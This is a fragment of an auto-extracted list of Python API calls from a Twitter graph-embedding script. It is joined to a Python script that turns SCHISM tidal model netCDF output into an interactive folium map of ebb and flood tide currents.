'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['weakly_connected_user_lemma_matrix'], {}), '(weakly_connected_user_lemma_matrix)\n', (7695, 7731), True, 'import scipy.sparse as spsp\n'), ((7772, 7912), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_graph_folder + '/mention_graph.tsv')", 'weakly_connected_mention_graph'], {'separator': '"""\t"""', 'directed': '(True)'}), "(weakly_connected_graph_folder + '/mention_graph.tsv',\n weakly_connected_mention_graph, separator='\\t', directed=True)\n", (7791, 7912), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((7986, 8126), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_graph_folder + '/retweet_graph.tsv')", 'weakly_connected_retweet_graph'], {'separator': '"""\t"""', 'directed': '(True)'}), "(weakly_connected_graph_folder + '/retweet_graph.tsv',\n weakly_connected_retweet_graph, separator='\\t', directed=True)\n", (8005, 8126), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((8200, 8353), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_graph_folder + '/user_lemma_matrix.tsv')", 'weakly_connected_user_lemma_matrix'], {'separator': '"""\t"""', 'directed': '(True)'}), "(weakly_connected_graph_folder +\n '/user_lemma_matrix.tsv', weakly_connected_user_lemma_matrix, separator\n ='\\t', directed=True)\n", (8219, 8353), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((8422, 8525), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_graph_folder + '/user_id_set' + '.pkl')", 'weakly_connected_user_id_set'], {}), "(weakly_connected_graph_folder + '/user_id_set' + '.pkl',\n weakly_connected_user_id_set)\n", (8434, 8525), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((8526, 8627), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_graph_folder + '/node_to_id' + '.pkl')", 'weakly_connected_node_to_id'], {}), "(weakly_connected_graph_folder + '/node_to_id' + '.pkl',\n weakly_connected_node_to_id)\n", (8538, 8627), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((8905, 9000), 'reveal_graph_embedding.datautil.snow_datautil.read_adjacency_matrix', 'read_adjacency_matrix', (["(weakly_connected_graph_folder + '/mention_graph.tsv')"], {'separator': '"""\t"""'}), "(weakly_connected_graph_folder + '/mention_graph.tsv',\n separator='\\t')\n", (8926, 9000), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((9017, 9112), 'reveal_graph_embedding.datautil.snow_datautil.read_adjacency_matrix', 'read_adjacency_matrix', (["(weakly_connected_graph_folder + '/retweet_graph.tsv')"], {'separator': '"""\t"""'}), "(weakly_connected_graph_folder + '/retweet_graph.tsv',\n separator='\\t')\n", (9038, 9112), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((9788, 9936), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(simple_undirected_graph_folder + '/mention_graph' + '.tsv')", 'simple_undirected_mention_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(simple_undirected_graph_folder + '/mention_graph' +\n '.tsv', simple_undirected_mention_graph, separator='\\t', directed=False)\n", (9807, 9936), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((10009, 10021), 'gc.collect', 'gc.collect', ([], {}), '()\n', (10019, 10021), False, 'import gc\n'), ((10261, 10409), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(simple_undirected_graph_folder + '/retweet_graph' + '.tsv')", 'simple_undirected_retweet_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(simple_undirected_graph_folder + '/retweet_graph' +\n '.tsv', simple_undirected_retweet_graph, separator='\\t', directed=False)\n", (10280, 10409), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((10482, 10494), 'gc.collect', 'gc.collect', ([], {}), '()\n', (10492, 10494), False, 'import gc\n'), ((11216, 11359), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(simple_undirected_graph_folder + '/men_ret_graph' + '.tsv')", 'simple_undirected_mr_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(simple_undirected_graph_folder + '/men_ret_graph' +\n '.tsv', simple_undirected_mr_graph, separator='\\t', directed=False)\n", (11235, 11359), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((11432, 11444), 'gc.collect', 'gc.collect', ([], {}), '()\n', (11442, 11444), False, 'import gc\n'), ((11832, 11900), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_combinatorial_laplacian', 'get_adjacency_matrix_via_combinatorial_laplacian', (['mention_graph', '(0.1)'], {}), '(mention_graph, 0.1)\n', (11880, 11900), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((12019, 12182), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(combinatorial_implicit_graph_folder + '/mention_graph' + '.tsv')", 'implicit_combinatorial_mention_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(combinatorial_implicit_graph_folder + '/mention_graph' +\n '.tsv', implicit_combinatorial_mention_graph, separator='\\t', directed=\n False)\n", (12038, 12182), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((12250, 12262), 'gc.collect', 'gc.collect', ([], {}), '()\n', (12260, 12262), False, 'import gc\n'), ((12423, 12491), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_combinatorial_laplacian', 'get_adjacency_matrix_via_combinatorial_laplacian', (['retweet_graph', '(0.1)'], {}), '(retweet_graph, 0.1)\n', (12471, 12491), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((12610, 12773), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(combinatorial_implicit_graph_folder + '/retweet_graph' + '.tsv')", 'implicit_combinatorial_retweet_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(combinatorial_implicit_graph_folder + '/retweet_graph' +\n '.tsv', implicit_combinatorial_retweet_graph, separator='\\t', directed=\n False)\n", (12629, 12773), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((12841, 12853), 'gc.collect', 'gc.collect', ([], {}), '()\n', (12851, 12853), False, 'import gc\n'), ((13831, 13894), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_directed_laplacian', 'get_adjacency_matrix_via_directed_laplacian', (['mention_graph', '(0.1)'], {}), '(mention_graph, 0.1)\n', (13874, 13894), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((14003, 14151), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(directed_implicit_graph_folder + '/mention_graph' + '.tsv')", 'implicit_directed_mention_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(directed_implicit_graph_folder + '/mention_graph' +\n '.tsv', implicit_directed_mention_graph, separator='\\t', directed=False)\n", (14022, 14151), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((14224, 14236), 'gc.collect', 'gc.collect', ([], {}), '()\n', (14234, 14236), False, 'import gc\n'), ((14382, 14445), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_directed_laplacian', 'get_adjacency_matrix_via_directed_laplacian', (['retweet_graph', '(0.1)'], {}), '(retweet_graph, 0.1)\n', (14425, 14445), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((14554, 14702), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(directed_implicit_graph_folder + '/retweet_graph' + '.tsv')", 'implicit_directed_retweet_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(directed_implicit_graph_folder + '/retweet_graph' +\n '.tsv', implicit_directed_retweet_graph, separator='\\t', directed=False)\n", (14573, 14702), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((14775, 14787), 'gc.collect', 'gc.collect', ([], {}), '()\n', (14785, 14787), False, 'import gc\n'), ((15704, 15801), 'reveal_user_classification.embedding.implicit.get_multiview_transition_matrix', 'get_multiview_transition_matrix', (['[mention_graph, retweet_graph]'], {'weights': 'None', 'method': '"""zhou"""'}), "([mention_graph, retweet_graph], weights=\n None, method='zhou')\n", (15735, 15801), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((16090, 16157), 'reveal_user_classification.embedding.implicit.get_implicit_adjacency_matrices', 'get_implicit_adjacency_matrices', (['men_ret_transition_matrix'], {'rho': '(0.1)'}), '(men_ret_transition_matrix, rho=0.1)\n', (16121, 16157), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((16241, 16404), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(combinatorial_implicit_graph_folder + '/men_ret_graph' + '.tsv')", 'implicit_combinatorial_men_ret_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(combinatorial_implicit_graph_folder + '/men_ret_graph' +\n '.tsv', implicit_combinatorial_men_ret_graph, separator='\\t', directed=\n False)\n", (16260, 16404), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((16472, 16620), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(directed_implicit_graph_folder + '/men_ret_graph' + '.tsv')", 'implicit_directed_men_ret_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(directed_implicit_graph_folder + '/men_ret_graph' +\n '.tsv', implicit_directed_men_ret_graph, separator='\\t', directed=False)\n", (16491, 16620), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((16693, 16705), 'gc.collect', 'gc.collect', ([], {}), '()\n', (16703, 16705), False, 'import gc\n'), ((18435, 18503), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(weakly_connected_graph_folder + '/user_id_set' + '.pkl')"], {}), "(weakly_connected_graph_folder + '/user_id_set' + '.pkl')\n", (18446, 18503), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((18538, 18605), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(weakly_connected_graph_folder + '/node_to_id' + '.pkl')"], {}), "(weakly_connected_graph_folder + '/node_to_id' + '.pkl')\n", (18549, 18605), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((18623, 18678), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/id_to_name' + '.pkl')"], {}), "(full_graph_folder + '/id_to_name' + '.pkl')\n", (18634, 18678), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((18742, 18774), 'os.listdir', 'os.listdir', (['twitter_lists_folder'], {}), '(twitter_lists_folder)\n', (18752, 18774), False, 'import os\n'), ((18935, 18976), 'os.listdir', 'os.listdir', (['twitter_lists_keywords_folder'], {}), '(twitter_lists_keywords_folder)\n', (18945, 18976), False, 'import os\n'), ((21446, 21462), 'reveal_user_annotation.twitter.manage_resources.get_reveal_set', 'get_reveal_set', ([], {}), '()\n', (21460, 21462), False, 'from reveal_user_annotation.twitter.manage_resources import get_reveal_set, get_topic_keyword_dictionary\n'), ((21488, 21518), 'reveal_user_annotation.twitter.manage_resources.get_topic_keyword_dictionary', 'get_topic_keyword_dictionary', ([], {}), '()\n', (21516, 21518), False, 'from reveal_user_annotation.twitter.manage_resources import get_reveal_set, get_topic_keyword_dictionary\n'), ((22180, 22346), 'reveal_user_annotation.twitter.user_annotate.form_user_term_matrix', 'form_user_term_matrix', (['implicated_user_twitter_list_keywords_gen', 'weakly_connected_id_to_node'], {'lemma_set': 'lemma_set', 'keyword_to_topic_manual': 'keyword_topic_dict'}), '(implicated_user_twitter_list_keywords_gen,\n weakly_connected_id_to_node, lemma_set=lemma_set,\n keyword_to_topic_manual=keyword_topic_dict)\n', (22201, 22346), False, 'from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix\n'), ((22665, 22806), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_label_folder + '/unfiltered_user_label_matrix' + '.tsv')", 'user_label_matrix', '"""\t"""'], {'directed': '(True)'}), "(weakly_connected_label_folder +\n '/unfiltered_user_label_matrix' + '.tsv', user_label_matrix, '\\t',\n directed=True)\n", (22684, 22806), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((22875, 22980), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_label_folder + '/unfiltered_annotated_nodes' + '.pkl')", 'annotated_nodes'], {}), "(weakly_connected_label_folder + '/unfiltered_annotated_nodes' +\n '.pkl', annotated_nodes)\n", (22887, 22980), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((22998, 23101), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_label_folder + '/unfiltered_label_to_lemma' + '.pkl')", 'label_to_lemma'], {}), "(weakly_connected_label_folder + '/unfiltered_label_to_lemma' +\n '.pkl', label_to_lemma)\n", (23010, 23101), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((23119, 23250), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_label_folder + '/unfiltered_node_to_lemma_tokeywordbag' +\n '.pkl')", 'node_to_lemma_tokeywordbag'], {}), "(weakly_connected_label_folder +\n '/unfiltered_node_to_lemma_tokeywordbag' + '.pkl',\n node_to_lemma_tokeywordbag)\n", (23131, 23250), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((23322, 23428), 'reveal_user_annotation.twitter.user_annotate.filter_user_term_matrix', 'filter_user_term_matrix', (['user_label_matrix', 'annotated_nodes', 'label_to_lemma'], {'max_number_of_labels': 'None'}), '(user_label_matrix, annotated_nodes, label_to_lemma,\n max_number_of_labels=None)\n', (23345, 23428), False, 'from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix\n'), ((23701, 23770), 'reveal_user_annotation.twitter.user_annotate.form_lemma_tokeyword_map', 'form_lemma_tokeyword_map', (['annotated_nodes', 'node_to_lemma_tokeywordbag'], {}), '(annotated_nodes, node_to_lemma_tokeywordbag)\n', (23725, 23770), False, 'from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix\n'), ((23998, 24124), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_label_folder + '/user_label_matrix' + '.tsv')", 'user_label_matrix', '"""\t"""'], {'directed': '(True)'}), "(weakly_connected_label_folder + '/user_label_matrix' +\n '.tsv', user_label_matrix, '\\t', directed=True)\n", (24017, 24124), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((24237, 24451), 'reveal_graph_embedding.datautil.snow_datautil.write_screen_name_to_topics', 'write_screen_name_to_topics', (["(weakly_connected_label_folder + '/user_name_to_topics' + '.tsv')", 'user_label_matrix', 'weakly_connected_node_to_id', 'id_to_name', 'label_to_lemma', 'lemma_to_keyword'], {'separator': '"""\t"""'}), "(weakly_connected_label_folder +\n '/user_name_to_topics' + '.tsv', user_label_matrix,\n weakly_connected_node_to_id, id_to_name, label_to_lemma,\n lemma_to_keyword, separator='\\t')\n", (24264, 24451), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((2079, 2103), 'numpy.ones', 'np.ones', (['matrix.shape[0]'], {}), '(matrix.shape[0])\n', (2086, 2103), True, 'import numpy as np\n'), ((2118, 2142), 'numpy.ones', 'np.ones', (['matrix.shape[1]'], {}), '(matrix.shape[1])\n', (2125, 2142), True, 'import numpy as np\n'), ((5491, 5521), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['mention_graph'], {}), '(mention_graph)\n', (5506, 5521), True, 'import scipy.sparse as spsp\n'), ((5638, 5668), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['retweet_graph'], {}), '(retweet_graph)\n', (5653, 5668), True, 'import scipy.sparse as spsp\n'), ((5797, 5831), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['user_lemma_matrix'], {}), '(user_lemma_matrix)\n', (5812, 5831), True, 'import scipy.sparse as spsp\n'), ((6806, 6836), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['mention_graph'], {}), '(mention_graph)\n', (6821, 6836), True, 'import scipy.sparse as spsp\n'), ((7061, 7091), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['retweet_graph'], {}), '(retweet_graph)\n', (7076, 7091), True, 'import scipy.sparse as spsp\n'), ((9734, 9782), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['simple_undirected_mention_graph'], {}), '(simple_undirected_mention_graph)\n', (9749, 9782), True, 'import scipy.sparse as spsp\n'), ((10207, 10255), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['simple_undirected_retweet_graph'], {}), '(simple_undirected_retweet_graph)\n', (10222, 10255), True, 'import scipy.sparse as spsp\n'), ((11167, 11210), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['simple_undirected_mr_graph'], {}), '(simple_undirected_mr_graph)\n', (11182, 11210), True, 'import scipy.sparse as spsp\n'), ((11960, 12013), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_combinatorial_mention_graph'], {}), '(implicit_combinatorial_mention_graph)\n', (11975, 12013), True, 'import scipy.sparse as spsp\n'), ((12551, 12604), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_combinatorial_retweet_graph'], {}), '(implicit_combinatorial_retweet_graph)\n', (12566, 12604), True, 'import scipy.sparse as spsp\n'), ((13949, 13997), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_directed_mention_graph'], {}), '(implicit_directed_mention_graph)\n', (13964, 13997), True, 'import scipy.sparse as spsp\n'), ((14500, 14548), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_directed_retweet_graph'], {}), '(implicit_directed_retweet_graph)\n', (14515, 14548), True, 'import scipy.sparse as spsp\n'), ((19604, 19737), 'functools.partial', 'partial', (['worker_function'], {'lemmatizing': '"""wordnet"""', 'source_folder': 'twitter_lists_folder', 'target_folder': 'twitter_lists_keywords_folder'}), "(worker_function, lemmatizing='wordnet', source_folder=\n twitter_lists_folder, target_folder=twitter_lists_keywords_folder)\n", (19611, 19737), False, 'from functools import partial\n'), ((21806, 21855), 'reveal_user_annotation.text.clean_text.clean_single_word', 'clean_single_word', (['keyword'], {'lemmatizing': '"""wordnet"""'}), "(keyword, lemmatizing='wordnet')\n", (21823, 21855), False, 'from reveal_user_annotation.text.clean_text import clean_single_word\n'), ((25102, 25126), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (['source_path'], {}), '(source_path)\n', (25113, 25126), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((25324, 25389), 'reveal_user_annotation.twitter.clean_twitter_list.user_twitter_list_bag_of_words', 'user_twitter_list_bag_of_words', (['twitter_lists_corpus', 'lemmatizing'], {}), '(twitter_lists_corpus, lemmatizing)\n', (25354, 25389), False, 'from reveal_user_annotation.twitter.clean_twitter_list import user_twitter_list_bag_of_words\n'), ((2567, 2603), 'numpy.array', 'np.array', (['[gr[newrows], gc[newcols]]'], {}), '([gr[newrows], gc[newcols]])\n', (2575, 2603), True, 'import numpy as np\n'), ((6168, 6214), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['(mention_graph + retweet_graph)'], {}), '(mention_graph + retweet_graph)\n', (6183, 6214), True, 'import scipy.sparse as spsp\n'), ((19567, 19587), 'reveal_user_annotation.common.config_package.get_threads_number', 'get_threads_number', ([], {}), '()\n', (19585, 19587), False, 'from reveal_user_annotation.common.config_package import get_threads_number\n'), ((25669, 25699), 'json.dump', 'json.dump', (['user_annotation', 'fp'], {}), '(user_annotation, fp)\n', (25678, 25699), False, 'import json\n'), ((1533, 1545), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (1543, 1545), True, 'import networkx as nx\n'), ((1622, 1632), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (1630, 1632), True, 'import networkx as nx\n'), ((19493, 19513), 'reveal_user_annotation.common.config_package.get_threads_number', 'get_threads_number', ([], {}), '()\n', (19511, 19513), False, 'from reveal_user_annotation.common.config_package import get_threads_number\n'), ((26038, 26050), 'json.load', 'json.load', (['f'], {}), '(f)\n', (26047, 26050), False, 'import json\n')] |
import netCDF4
from tvtk.api import tvtk
from mayavi import mlab
import numpy
from scipy.interpolate import griddata,RegularGridInterpolator
from numpy import mgrid, empty, sin, pi, array, meshgrid, arange, prod
import rasterio
import os
import matplotlib.pyplot as plt
from matplotlib import cm
from pyproj import Proj, transform
import fiona
from matplotlib.path import Path
from folium.plugins import TimestampedGeoJson
import mplleaflet
import folium
import branca
import dateutil
from datetime import timedelta
from matplotlib.dates import num2date,date2num
inProj = Proj(init='epsg:'+str(2193))
outProj = Proj(init='epsg:'+str(4326))
# some path to your local netcdf file
#path = '/home/remy/Calypso/Projects/006_Southport/hydro/child/hg6_dt30_newD/outputs/schout_14.nc'
T0=dateutil.parser.parse('2019-09-02T12:00:00Z')
fileout='Fov.html'
path = '/home/remy/Calypso/Projects/006_Southport/hydro/mother/schism/run5/outputs/schout_14.nc'
#T0=dateutil.parser.parse('2020-01-03T09:00:00Z')#T0=datenum(2020,01,03,09,00,00)+0/24;ext=3;
#fileout='Neap_tide.html'
lim=[1241352-400,1245886+2500,4825135,4830428]
lim=[1110740,1304120,4704419,4874442]
#lim=[1236590,1254365,4821428,4836312]
quiver_res=300
quiver_res=50
quiver_scale=80
# try and import the dataset, prefer netcdf4, you might want to use pydap also here if you access a dap server.
ds = netCDF4.Dataset(path)
X=ds.variables['SCHISM_hgrid_node_x'][:]
Y=ds.variables['SCHISM_hgrid_node_y'][:]
X,Y=transform(inProj,outProj,X,Y)
lim[0],lim[2]=transform(inProj,outProj,lim[0],lim[2])
lim[1],lim[3]=transform(inProj,outProj,lim[1],lim[3])
off=0
gd = (X>=lim[0]-off) & (X<=lim[1]+off) & (Y>=lim[2]-off) & (Y<=lim[3]+off)
X=X[gd]
Y=Y[gd]
XY=numpy.array((X,Y)).T
d= ds.variables['depth'][:]
d=d[gd]
dtime = netCDF4.num2date(ds.variables['time'][:],ds.variables['time'].units)
dtime=[date2num(x._to_real_datetime()) for x in dtime]
idxTs=[]
for dt in numpy.arange(-6,6.5,1):
to=date2num(T0+timedelta(hours=dt))
idxTs.append(dtime.index(min(dtime, key=lambda x:abs(x-to))))
#D=D[gd]
Xreg, Yreg = numpy.meshgrid(numpy.linspace(lim[0],lim[1], quiver_res), numpy.linspace(lim[2], lim[3], quiver_res))
mapa = folium.Map(location=[Yreg.mean(), Xreg.mean()], tiles="Cartodb Positron",
zoom_start=10)
# shape = fiona.open('/home/remy/Calypso/Projects/006_Southport/hydro/child/animation/poly.shp')
verts=[]
# for poly in shape:
# if poly['geometry']!=None :
# nvert=len(poly['geometry']['coordinates'][0])
# verts.append([(poly['geometry']['coordinates'][0][x][0],poly['geometry']['coordinates'][0][x][1]) for x in range(0,nvert)])
is_first=True
for i,idxT in enumerate(idxTs):
print(i)
if (i!=2) and (i!=9):
continue
# read the variables (these are just links to the objects for now)
u = ds.variables['hvel'][idxT,:,-1,0] # velocity in u direction
v = ds.variables['hvel'][idxT,:,-1,1] # v direction
e = ds.variables['elev'][idxT,:] # v direction
e=e[gd]
u=u[gd]
v=v[gd]
bad=e+d<0.1
U = griddata(XY[~bad,:], u[~bad],(Xreg,Yreg),method='linear')
V = griddata(XY[~bad,:], v[~bad],(Xreg,Yreg),method='linear')
E = griddata(XY[~bad,:], e[~bad],(Xreg,Yreg),method='linear')
D = griddata(XY[~bad,:], d[~bad],(Xreg,Yreg),method='linear')
fig = plt.figure(figsize=(30,18))
ax = fig.add_subplot(111)
ax.set_aspect('equal')
mag=numpy.sqrt(U**2+V**2)*1.94
U[numpy.isnan(U)]=0
V[numpy.isnan(V)]=0
mag[numpy.isnan(mag)]=0
#Xreg[numpy.isnan(Xreg)]=0
#Yreg[numpy.isnan(Yreg)]=0
Q = ax.quiver(Xreg, Yreg, U*1.94, V*1.94,mag,scale=quiver_scale,color=cm.viridis(64),clim=[0,4])
gj = mplleaflet.fig_to_geojson(fig=fig)
if i==2:
name='Ebb tide'
elif i==9:
name='Flood tide'
feature_group0 = folium.FeatureGroup(name=name,show=is_first)
#'%.1fH' % ((dtime[idxTs[i]]-date2num(T0))*24)
is_first=False
spd=RegularGridInterpolator([Yreg[:,0],Xreg[0,:]],mag)
for feature in gj['features']:
if feature['geometry']['type'] == 'Point':
lon, lat = feature['geometry']['coordinates']
div = feature['properties']['html']
flag=False
for vert in verts:
p=Path(vert)
flag = p.contains_points([[lon,lat]])
if flag:
break
Spd=spd([lat,lon])[0]
if not flag and Spd>0.05:
#print(Spd)
icon_anchor = (feature['properties']['anchor_x'],
feature['properties']['anchor_y'])
icon = folium.features.DivIcon(html=div,
icon_anchor=icon_anchor)
#spd=
marker = folium.Marker([lat, lon], icon=icon)
marker.add_child(folium.Popup('%.1f' % Spd))
feature_group0.add_child(marker)
else:
msg = "Unexpected geometry {}".format
raise ValueError(msg(feature['geometry']))
mapa.add_child(feature_group0)
tile = folium.TileLayer(
tiles = 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}',
attr = 'Esri',
name = 'Esri Satellite',
overlay = False,
control = False
).add_to(mapa)
colormap = branca.colormap.linear.viridis.scale(0, 4)
colormap = colormap.to_step(index=numpy.arange(0,4.01,.01))
colormap.caption = 'Tidal speed [knt]'
colormap.add_to(mapa)
folium.LayerControl(collapsed=False).add_to(mapa)
mapa.save(fileout)
| [
"numpy.isnan",
"folium.TileLayer",
"matplotlib.pyplot.figure",
"numpy.arange",
"netCDF4.Dataset",
"datetime.timedelta",
"numpy.linspace",
"mplleaflet.fig_to_geojson",
"folium.features.DivIcon",
"dateutil.parser.parse",
"scipy.interpolate.griddata",
"folium.Popup",
"branca.colormap.linear.vir... | [((783, 828), 'dateutil.parser.parse', 'dateutil.parser.parse', (['"""2019-09-02T12:00:00Z"""'], {}), "('2019-09-02T12:00:00Z')\n", (804, 828), False, 'import dateutil\n'), ((1354, 1375), 'netCDF4.Dataset', 'netCDF4.Dataset', (['path'], {}), '(path)\n', (1369, 1375), False, 'import netCDF4\n'), ((1463, 1495), 'pyproj.transform', 'transform', (['inProj', 'outProj', 'X', 'Y'], {}), '(inProj, outProj, X, Y)\n', (1472, 1495), False, 'from pyproj import Proj, transform\n'), ((1507, 1549), 'pyproj.transform', 'transform', (['inProj', 'outProj', 'lim[0]', 'lim[2]'], {}), '(inProj, outProj, lim[0], lim[2])\n', (1516, 1549), False, 'from pyproj import Proj, transform\n'), ((1561, 1603), 'pyproj.transform', 'transform', (['inProj', 'outProj', 'lim[1]', 'lim[3]'], {}), '(inProj, outProj, lim[1], lim[3])\n', (1570, 1603), False, 'from pyproj import Proj, transform\n'), ((1770, 1839), 'netCDF4.num2date', 'netCDF4.num2date', (["ds.variables['time'][:]", "ds.variables['time'].units"], {}), "(ds.variables['time'][:], ds.variables['time'].units)\n", (1786, 1839), False, 'import netCDF4\n'), ((1917, 1941), 'numpy.arange', 'numpy.arange', 